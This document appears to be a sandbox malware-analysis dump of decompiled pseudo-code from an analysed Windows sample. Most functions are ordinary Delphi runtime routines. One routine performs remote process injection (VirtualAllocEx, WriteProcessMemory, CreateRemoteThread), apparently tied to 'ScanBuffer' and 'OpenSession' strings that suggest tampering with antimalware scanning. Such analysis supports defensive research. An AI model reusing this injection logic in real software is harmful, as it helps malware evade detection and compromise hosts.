                                                                                                				if(_t25 == 0) {
                                                                                                					_t25 = 0;
                                                                                                				}
                                                                                                				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                                				_v28 = _v8 * _v12;
                                                                                                				_v24 = 0;
                                                                                                				_t46 = _v24;
                                                                                                				_t31 = E02175824(_v28, _t46, _v16, 0);
                                                                                                				_t37 = _a8;
                                                                                                				 *_t37 = _t31;
                                                                                                				 *((intOrPtr*)(_t37 + 4)) = _t46;
                                                                                                				_t48 = _v24;
                                                                                                				_t34 = E02175824(_v28, _t48, _v20, 0);
                                                                                                				_t38 = _a12;
                                                                                                				 *_t38 = _t34;
                                                                                                				 *((intOrPtr*)(_t38 + 4)) = _t48;
                                                                                                				return _t26;
                                                                                                			}


















                                                                                                APIs
                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0217825D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeSpace
                                                                                                • String ID:
                                                                                                • API String ID: 1705453755-0
                                                                                                • Opcode ID: b9d40280101639a8c5387bd15563a96d03aa120393c99a54a6e33f677c5061b5
                                                                                                • Instruction ID: 3469522c7a1b83878f9179418ac7af2a13d5cf63a20b1e07df7b2f000b21c120
                                                                                                • Opcode Fuzzy Hash: b9d40280101639a8c5387bd15563a96d03aa120393c99a54a6e33f677c5061b5
                                                                                                • Instruction Fuzzy Hash: DE11D6B5E00209AF9B04CF99C881DAFF7F9EFC8310B54C569A509E7254D7319E01CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217A9B8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                                				char _v260;
                                                                                                				int _t5;
                                                                                                				intOrPtr _t10;
                                                                                                				void* _t18;
                                                                                                
                                                                                                				_t18 = __ecx;
                                                                                                				_t10 = _a4;
                                                                                                				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
                                                                                                				_t19 = _t5;
                                                                                                				if(_t5 <= 0) {
                                                                                                					return E021748F4(_t10, _t18);
                                                                                                				}
                                                                                                				return E02174990(_t10, _t5 - 1,  &_v260, _t19);
                                                                                                			}








                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 970b2ee4ffdceb79d1b7860d65872896ae916278293f28f4050da8f3dc609713
                                                                                                • Instruction ID: c94894e6a19845f259ab26a6c9ce2a3dcb3098ee214e22430c553edc31c53980
                                                                                                • Opcode Fuzzy Hash: 970b2ee4ffdceb79d1b7860d65872896ae916278293f28f4050da8f3dc609713
                                                                                                • Instruction Fuzzy Hash: D6E0D8717842585BD314A95C5C80DFA727DEBDC310F00427ABE59C7340EFA09DD04AE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217B938() {
                                                                                                				char _v128;
                                                                                                				intOrPtr _v132;
                                                                                                				signed int _v136;
                                                                                                				intOrPtr _v140;
                                                                                                				intOrPtr _v144;
                                                                                                				int _t7;
                                                                                                				struct _OSVERSIONINFOA* _t18;
                                                                                                
                                                                                                				_t18->dwOSVersionInfoSize = 0x94;
                                                                                                				_t7 = GetVersionExA(_t18);
                                                                                                				if(_t7 != 0) {
                                                                                                					 *0x21907e4 = _v132;
                                                                                                					 *0x21907e8 = _v144;
                                                                                                					 *0x21907ec = _v140;
                                                                                                					if( *0x21907e4 != 1) {
                                                                                                						 *0x21907f0 = _v136;
                                                                                                					} else {
                                                                                                						 *0x21907f0 = _v136 & 0x0000ffff;
                                                                                                					}
                                                                                                					return E02174B10(0x21907f4, 0x80,  &_v128);
                                                                                                				}
                                                                                                				return _t7;
                                                                                                			}











                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?,0218F106,00000000,0218F11E), ref: 0217B946
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Version
                                                                                                • String ID:
                                                                                                • API String ID: 1889659487-0
                                                                                                • Opcode ID: 67518e739572cf5e603bc144c61e7e4976d7356c359485cc2ac49126f4ffb00e
                                                                                                • Instruction ID: 9deb4e4d961f33b055f37fa8d69cd5e0152659b539a86a2e6517d6b4f90d4f97
                                                                                                • Opcode Fuzzy Hash: 67518e739572cf5e603bc144c61e7e4976d7356c359485cc2ac49126f4ffb00e
                                                                                                • Instruction Fuzzy Hash: A2F0B7B49893029FC358DF28E540B1AB7F5EB88324F004D2DA5E8C7394E736A9558F92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E0217AA04(int __eax, signed int __ecx, int __edx) {
                                                                                                				char _v16;
                                                                                                				signed int _t5;
                                                                                                				signed int _t6;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t6 = __ecx;
                                                                                                				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                                					_t5 = _t6;
                                                                                                				} else {
                                                                                                					_t5 = _v16 & 0x000000ff;
                                                                                                				}
                                                                                                				return _t5;
                                                                                                			}







                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0217C01E,00000000,0217C237,?,?,00000000,00000000), ref: 0217AA17
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: bb273cdce3cd20e8bf6165c07a061c1bd383eb027c3837f97ac3610f7129eeb8
                                                                                                • Instruction ID: 5dfa86f4fc8426d5a125cde211b57acec4a2776731cfa886e26d9d151d0a6a6b
                                                                                                • Opcode Fuzzy Hash: bb273cdce3cd20e8bf6165c07a061c1bd383eb027c3837f97ac3610f7129eeb8
                                                                                                • Instruction Fuzzy Hash: E4D05EA235E2A02EA314515A2E84D7F5AECCECA7A2F00443AF548C6140D300CC059772
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02179438() {
                                                                                                				struct _SYSTEMTIME* _t2;
                                                                                                
                                                                                                				GetLocalTime(_t2);
                                                                                                				return _t2->wYear & 0x0000ffff;
                                                                                                			}





                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID:
                                                                                                • API String ID: 481472006-0
                                                                                                • Opcode ID: 6dd34a849c2f346cf2e2f5751c819418c1277ca2abf746d71a13b971fa9c721c
                                                                                                • Instruction ID: e3c4c756ad91661a80db63d29355fce77fcfe0c3166096fd543d1615b8d494bf
                                                                                                • Opcode Fuzzy Hash: 6dd34a849c2f346cf2e2f5751c819418c1277ca2abf746d71a13b971fa9c721c
                                                                                                • Instruction Fuzzy Hash: 2FA01210844C2005824033180C0213530545840620FC40B5068F8402D0EA1D413094D3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 51%
                                                                                                			E021720F4(void* __eax, char* __edx) {
                                                                                                				char* _t103;
                                                                                                
                                                                                                				_t103 = __edx;
                                                                                                				_t39 = __eax + 1;
                                                                                                				 *__edx = 0xffffffff89705f71;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = 0xbadbbd;
                                                                                                				asm("sbb edi, 0xffffffff");
                                                                                                				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
                                                                                                				_t37 = _t103 + 1; // 0x1
                                                                                                				return _t37;
                                                                                                			}





                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217D480() {
                                                                                                				struct HINSTANCE__* _v8;
                                                                                                				intOrPtr _t46;
                                                                                                				void* _t91;
                                                                                                
                                                                                                				_v8 = GetModuleHandleA("oleaut32.dll");
                                                                                                				 *0x2194224 = E0217D454("VariantChangeTypeEx", E0217CFEC, _t91);
                                                                                                				 *0x2194228 = E0217D454("VarNeg", E0217D01C, _t91);
                                                                                                				 *0x219422c = E0217D454("VarNot", E0217D01C, _t91);
                                                                                                				 *0x2194230 = E0217D454("VarAdd", E0217D028, _t91);
                                                                                                				 *0x2194234 = E0217D454("VarSub", E0217D028, _t91);
                                                                                                				 *0x2194238 = E0217D454("VarMul", E0217D028, _t91);
                                                                                                				 *0x219423c = E0217D454("VarDiv", E0217D028, _t91);
                                                                                                				 *0x2194240 = E0217D454("VarIdiv", E0217D028, _t91);
                                                                                                				 *0x2194244 = E0217D454("VarMod", E0217D028, _t91);
                                                                                                				 *0x2194248 = E0217D454("VarAnd", E0217D028, _t91);
                                                                                                				 *0x219424c = E0217D454("VarOr", E0217D028, _t91);
                                                                                                				 *0x2194250 = E0217D454("VarXor", E0217D028, _t91);
                                                                                                				 *0x2194254 = E0217D454("VarCmp", E0217D034, _t91);
                                                                                                				 *0x2194258 = E0217D454("VarI4FromStr", E0217D040, _t91);
                                                                                                				 *0x219425c = E0217D454("VarR4FromStr", E0217D0AC, _t91);
                                                                                                				 *0x2194260 = E0217D454("VarR8FromStr", E0217D118, _t91);
                                                                                                				 *0x2194264 = E0217D454("VarDateFromStr", E0217D184, _t91);
                                                                                                				 *0x2194268 = E0217D454("VarCyFromStr", E0217D1F0, _t91);
                                                                                                				 *0x219426c = E0217D454("VarBoolFromStr", E0217D25C, _t91);
                                                                                                				 *0x2194270 = E0217D454("VarBstrFromCy", E0217D2DC, _t91);
                                                                                                				 *0x2194274 = E0217D454("VarBstrFromDate", E0217D34C, _t91);
                                                                                                				_t46 = E0217D454("VarBstrFromBool", E0217D3C0, _t91);
                                                                                                				 *0x2194278 = _t46;
                                                                                                				return _t46;
                                                                                                			}







                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0217D489
                                                                                                  • Part of subcall function 0217D454: GetProcAddress.KERNEL32(00000000), ref: 0217D46D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                • API String ID: 1646373207-1918263038
                                                                                                • Opcode ID: beffe5d74b713625b9bfd3d2e25978579cab34a52b086afe4208682f627ffbd1
                                                                                                • Instruction ID: 37ff22d6168cf3671318f6371bd874befbfe84e8774082dc33d873a23b400359
                                                                                                • Opcode Fuzzy Hash: beffe5d74b713625b9bfd3d2e25978579cab34a52b086afe4208682f627ffbd1
                                                                                                • Instruction Fuzzy Hash: AA41FE61AC520C5F62086A6DB64042777FAEFC47107B4942AB40EEFB45DF30BC96CE69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02185CD8(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t15;
                                                                                                				void* _t17;
                                                                                                				void* _t19;
                                                                                                				void* _t26;
                                                                                                				long _t27;
                                                                                                				void* _t28;
                                                                                                
                                                                                                				_t20 = __ecx;
                                                                                                				_t28 = __ecx;
                                                                                                				_t26 = __edx;
                                                                                                				_t19 = __eax;
                                                                                                				_t27 = 0;
                                                                                                				 *0x21944ec = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
                                                                                                				 *0x21944e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
                                                                                                				 *0x21944e4 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
                                                                                                				 *0x21944f4 = E02185A40(_t19, _t19, _t20, _t28, _t26, 0);
                                                                                                				 *0x21944f0 = E02185A40(_t19, _t19, _t20, _t26, _t26, 0);
                                                                                                				 *0x21944e0 = E02185B0C(_t19, 0x21944e4, E02185CA8, 0, 0x14);
                                                                                                				if( *0x21944e0 != 0) {
                                                                                                					_t15 =  *0x21944e0; // 0x0
                                                                                                					WaitForSingleObject(_t15, 0xffffffff);
                                                                                                					_t17 =  *0x21944e0; // 0x0
                                                                                                					GetExitCodeThread(_t17, 0x21944f8);
                                                                                                					_t27 =  *0x21944f8; // 0x0
                                                                                                				}
                                                                                                				return _t27;
                                                                                                			}














                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA,02194590,ScanBuffer,02194598,0218635C,OpenSession,02194598,0218635C,00000000,00000000), ref: 02185CEE
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185CF4
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA,02194590,ScanBuffer,02194598,0218635C,OpenSession,02194598), ref: 02185D08
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185D0E
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA,02194590,ScanBuffer,02194598), ref: 02185D22
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185D28
                                                                                                  • Part of subcall function 02185A40: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02185AC6,?,?,?,?,00000000,00000000,00000000), ref: 02185A80
                                                                                                  • Part of subcall function 02185A40: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02185AC6), ref: 02185AA6
                                                                                                  • Part of subcall function 02185B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                  • Part of subcall function 02185B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
                                                                                                  • Part of subcall function 02185B0C: ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA), ref: 02185D79
                                                                                                • GetExitCodeThread.KERNEL32(00000000,021944F8,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598), ref: 02185D89
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                                                                                • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                                                                                • API String ID: 3826234517-3123223305
                                                                                                • Opcode ID: 31e0a96aaa12c2d247a591d6931e1918e44d3d4f96060d22f2ea844498818ab4
                                                                                                • Instruction ID: ca5b70c5aa7aa8309b6a034d59f9c780ca0833a8c857c12cccb9a55535008e6e
                                                                                                • Opcode Fuzzy Hash: 31e0a96aaa12c2d247a591d6931e1918e44d3d4f96060d22f2ea844498818ab4
                                                                                                • Instruction Fuzzy Hash: C9118270BC03503EE720BAB86CC895B7BFFE782714B820935E525AB241DB7158428F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 98%
                                                                                                			E02172560(void* __eax, void* __fp0) {
                                                                                                				void* _v8;
                                                                                                				char _v110600;
                                                                                                				char _v112644;
                                                                                                				char _v112645;
                                                                                                				signed int _v112652;
                                                                                                				char _v112653;
                                                                                                				char _v112654;
                                                                                                				char _v112660;
                                                                                                				intOrPtr _v112664;
                                                                                                				intOrPtr _v112668;
                                                                                                				intOrPtr _v112672;
                                                                                                				struct HWND__* _v112676;
                                                                                                				signed short* _v112680;
                                                                                                				intOrPtr* _v112684;
                                                                                                				char _v129068;
                                                                                                				char _v131117;
                                                                                                				char _v161836;
                                                                                                				void* _v162091;
                                                                                                				signed char _v162092;
                                                                                                				void* _t73;
                                                                                                				int _t79;
                                                                                                				signed int _t126;
                                                                                                				int _t131;
                                                                                                				intOrPtr _t132;
                                                                                                				char* _t134;
                                                                                                				char* _t135;
                                                                                                				char* _t136;
                                                                                                				char* _t137;
                                                                                                				char* _t138;
                                                                                                				char* _t139;
                                                                                                				char* _t141;
                                                                                                				char* _t142;
                                                                                                				char* _t147;
                                                                                                				char* _t148;
                                                                                                				intOrPtr _t180;
                                                                                                				void* _t182;
                                                                                                				void* _t184;
                                                                                                				void* _t185;
                                                                                                				intOrPtr* _t188;
                                                                                                				intOrPtr* _t189;
                                                                                                				signed int _t194;
                                                                                                				void* _t197;
                                                                                                				void* _t198;
                                                                                                				void* _t211;
                                                                                                
                                                                                                				_push(__eax);
                                                                                                				_t73 = 0x27;
                                                                                                				goto L1;
                                                                                                				L12:
                                                                                                				while(_t180 != 0x2191700) {
                                                                                                					_t79 = E02172078(_t180);
                                                                                                					_t131 = _t79;
                                                                                                					__eflags = _t131;
                                                                                                					if(_t131 == 0) {
                                                                                                						L11:
                                                                                                						_t180 =  *((intOrPtr*)(_t180 + 4));
                                                                                                						continue;
                                                                                                					} else {
                                                                                                						goto L4;
                                                                                                					}
                                                                                                					do {
                                                                                                						L4:
                                                                                                						_t194 =  *(_t131 - 4);
                                                                                                						__eflags = _t194 & 0x00000001;
                                                                                                						if((_t194 & 0x00000001) == 0) {
                                                                                                							__eflags = _t194 & 0x00000004;
                                                                                                							if(__eflags == 0) {
                                                                                                								__eflags = _v112652 - 0x1000;
                                                                                                								if(_v112652 < 0x1000) {
                                                                                                									_v112664 = (_t194 & 0xfffffff0) - 4;
                                                                                                									_t126 = E021723BC(_t131);
                                                                                                									__eflags = _t126;
                                                                                                									if(_t126 == 0) {
                                                                                                										_v112645 = 0;
                                                                                                										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
                                                                                                										_t18 =  &_v112652;
                                                                                                										 *_t18 = _v112652 + 1;
                                                                                                										__eflags =  *_t18;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								E02172414(_t131, __eflags, _t197);
                                                                                                							}
                                                                                                						}
                                                                                                						_t79 = E02172054(_t131);
                                                                                                						_t131 = _t79;
                                                                                                						__eflags = _t131;
                                                                                                					} while (_t131 != 0);
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				_t132 =  *0x21937a8; // 0x7f9f0000
                                                                                                				while(_t132 != 0x21937a4 && _v112652 < 0x1000) {
                                                                                                					_t79 = E021723BC(_t132 + 0x10);
                                                                                                					__eflags = _t79;
                                                                                                					if(_t79 == 0) {
                                                                                                						_v112645 = 0;
                                                                                                						_t79 = _v112652;
                                                                                                						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *(_t132 + 0xc) & 0xfffffff0) - 0xfffffffffffffff4;
                                                                                                						_t27 =  &_v112652;
                                                                                                						 *_t27 = _v112652 + 1;
                                                                                                						__eflags =  *_t27;
                                                                                                					}
                                                                                                					_t132 =  *((intOrPtr*)(_t132 + 4));
                                                                                                				}
                                                                                                				if(_v112645 != 0) {
                                                                                                					L48:
                                                                                                					return _t79;
                                                                                                				}
                                                                                                				_v112653 = 0;
                                                                                                				_v112668 = 0;
                                                                                                				_t134 = E02172210(0x28,  &_v161836);
                                                                                                				_v112660 = 0x37;
                                                                                                				_v112680 = 0x2190046;
                                                                                                				_v112684 =  &_v110600;
                                                                                                				do {
                                                                                                					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
                                                                                                					_v112654 = 0;
                                                                                                					_t182 = 0xff;
                                                                                                					_t188 = _v112684;
                                                                                                					while(_t134 <=  &_v131117) {
                                                                                                						if( *_t188 > 0) {
                                                                                                							if(_v112653 == 0) {
                                                                                                								_t134 = E02172210(0x27, _t134);
                                                                                                								_v112653 = 1;
                                                                                                							}
                                                                                                							if(_v112654 != 0) {
                                                                                                								 *_t134 = 0x2c;
                                                                                                								_t139 = _t134 + 1;
                                                                                                								 *_t139 = 0x20;
                                                                                                								_t140 = _t139 + 1;
                                                                                                								__eflags = _t139 + 1;
                                                                                                							} else {
                                                                                                								 *_t134 = 0xd;
                                                                                                								 *((char*)(_t134 + 1)) = 0xa;
                                                                                                								_t147 = E021720F4(_v112668 + 1, _t134 + 2);
                                                                                                								 *_t147 = 0x20;
                                                                                                								_t148 = _t147 + 1;
                                                                                                								 *_t148 = 0x2d;
                                                                                                								 *((char*)(_t148 + 1)) = 0x20;
                                                                                                								_t140 = E02172210(8, E021720F4(_v112672, _t148 + 2));
                                                                                                								_v112654 = 1;
                                                                                                							}
                                                                                                							_t211 = _t182 - 1;
                                                                                                							if(_t211 < 0) {
                                                                                                								_t141 = E02172210(7, _t140);
                                                                                                							} else {
                                                                                                								if(_t211 == 0) {
                                                                                                									_t141 = E02172210(6, _t140);
                                                                                                								} else {
                                                                                                									E02173BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
                                                                                                									_t141 = E02172210(_v162092 & 0x000000ff, _t140);
                                                                                                								}
                                                                                                							}
                                                                                                							 *_t141 = 0x20;
                                                                                                							_t142 = _t141 + 1;
                                                                                                							 *_t142 = 0x78;
                                                                                                							 *((char*)(_t142 + 1)) = 0x20;
                                                                                                							_t134 = E021720F4( *_t188, _t142 + 2);
                                                                                                						}
                                                                                                						_t182 = _t182 - 1;
                                                                                                						_t188 = _t188 - 8;
                                                                                                						if(_t182 != 0xffffffff) {
                                                                                                							continue;
                                                                                                						} else {
                                                                                                							goto L37;
                                                                                                						}
                                                                                                					}
                                                                                                					L37:
                                                                                                					_v112668 = _v112672;
                                                                                                					_v112684 = _v112684 + 0x800;
                                                                                                					_v112680 =  &(_v112680[0x10]);
                                                                                                					_t60 =  &_v112660;
                                                                                                					 *_t60 = _v112660 - 1;
                                                                                                				} while ( *_t60 != 0);
                                                                                                				if(_v112652 <= 0) {
                                                                                                					L47:
                                                                                                					E02172210(3, _t134);
                                                                                                					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
                                                                                                					goto L48;
                                                                                                				}
                                                                                                				if(_v112653 != 0) {
                                                                                                					 *_t134 = 0xd;
                                                                                                					_t136 = _t134 + 1;
                                                                                                					 *_t136 = 0xa;
                                                                                                					_t137 = _t136 + 1;
                                                                                                					 *_t137 = 0xd;
                                                                                                					_t138 = _t137 + 1;
                                                                                                					 *_t138 = 0xa;
                                                                                                					_t134 = _t138 + 1;
                                                                                                				}
                                                                                                				_t134 = E02172210(0x3c, _t134);
                                                                                                				_t184 = _v112652 - 1;
                                                                                                				if(_t184 >= 0) {
                                                                                                					_t185 = _t184 + 1;
                                                                                                					_v112676 = 0;
                                                                                                					_t189 =  &_v129068;
                                                                                                					L43:
                                                                                                					if(_v112676 != 0) {
                                                                                                						 *_t134 = 0x2c;
                                                                                                						_t135 = _t134 + 1;
                                                                                                						 *_t135 = 0x20;
                                                                                                						_t134 = _t135 + 1;
                                                                                                					}
                                                                                                					_t134 = E021720F4( *_t189, _t134);
                                                                                                					if(_t134 >  &_v131117) {
                                                                                                						goto L47;
                                                                                                					}
                                                                                                					_v112676 =  &(_v112676->i);
                                                                                                					_t189 = _t189 + 4;
                                                                                                					_t185 = _t185 - 1;
                                                                                                					if(_t185 != 0) {
                                                                                                						goto L43;
                                                                                                					}
                                                                                                				}
                                                                                                				L1:
                                                                                                				_t198 = _t198 + 0xfffff004;
                                                                                                				_push(_t73);
                                                                                                				_t73 = _t73 - 1;
                                                                                                				if(_t73 != 0) {
                                                                                                					goto L1;
                                                                                                				} else {
                                                                                                					E02173518( &_v112644, 0x1b800);
                                                                                                					E02173518( &_v129068, 0x4000);
